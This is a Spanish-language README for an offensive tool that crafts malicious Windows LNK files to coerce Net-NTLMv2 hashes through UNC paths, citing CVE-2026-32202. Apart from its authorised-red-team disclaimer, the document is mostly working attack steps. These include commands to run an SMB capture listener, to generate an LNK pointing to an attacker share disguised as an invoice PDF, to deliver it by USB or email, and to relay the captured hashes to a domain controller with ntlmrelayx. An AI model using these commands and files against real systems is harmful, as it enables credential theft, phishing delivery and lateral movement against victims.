
Genera archivos LNK maliciosos para forzar hashes Net-NTLMv2 mediante el manejo UNC de Windows Shell, con listener SMB personalizado e integración de relay para operaciones autorizadas de red team.
Descargo de responsabilidad
Esta herramienta es solo para pruebas de penetración y red team autorizadas.
El uso no autorizado contra sistemas sin permiso explícito es ilegal.
Úsela bajo su propio riesgo. El autor no asume ninguna responsabilidad por mal uso o daños.
Descripción
Coerción de hash NTLMv2 mediante bypass incompleto de la protección de Shell de Windows (CVE-2026-32202). Genera archivos LNK especialmente diseñados que fuerzan la autenticación SMB/UNC al abrir o previsualizar en el Explorador. Baja interacción, funciona en sistemas parcheados donde la corrección de abril de 2026 fue insuficiente. Utilizada activamente en compromisos.
Características principales
Qué hace el exploit
La herramienta crea un .LNK manipulado que abusa del manejo de rutas UNC por parte de Shell en Target + IconEnvironmentDataBlock / estructuras ExtraData. Cuando la víctima navega por la carpeta o pasa el cursor/previsualiza el archivo, Windows Shell inicia una conexión SMB al UNC controlado por el atacante, filtrando el hash Net-NTLMv2 de la máquina/usuario. Sin ejecución de código en el objetivo: coerción de credenciales para relay o cracking.
Por qué es útil
Dependencias
Instalación: pip install -r requirements.txt
Uso
# 1. Iniciar servidor de captura (host atacante)
python smbcapture.py -i 0.0.0.0 -p 445 --output hashes.txt
# 2. Generar LNK malicioso
python coercegen.py --unc \\attacker-ip\share\test --output "Invoice_Q2.lnk" --spoof "invoice.pdf"
# Opcional: modo estable o bypass
python coercestable.py --unc \\attacker-ip\share\test --output "Report.lnk"
# 3. Entregar el LNK (USB, recurso compartido, adjunto de correo, OneDrive, etc.)
# 4. Esperar el hash en la terminal + archivo. Ejemplo de relay:
ntlmrelayx.py -t smb://target-dc -c whoami --no-wmipriv
# o relay LDAP para RBCD, HTTP para certificados ADCS, etc.
Exploit
Limitaciones
Causa raíz (breve)
Corrección incompleta en la sanitización de rutas UNC de Windows Shell y el procesamiento de bloques ExtraData para la resolución de iconos/objetivos de LNK. El mecanismo de protección destinado a bloquear la suplantación de red no autenticada aún activa la autenticación NTLM durante la enumeración del espacio de nombres de Shell.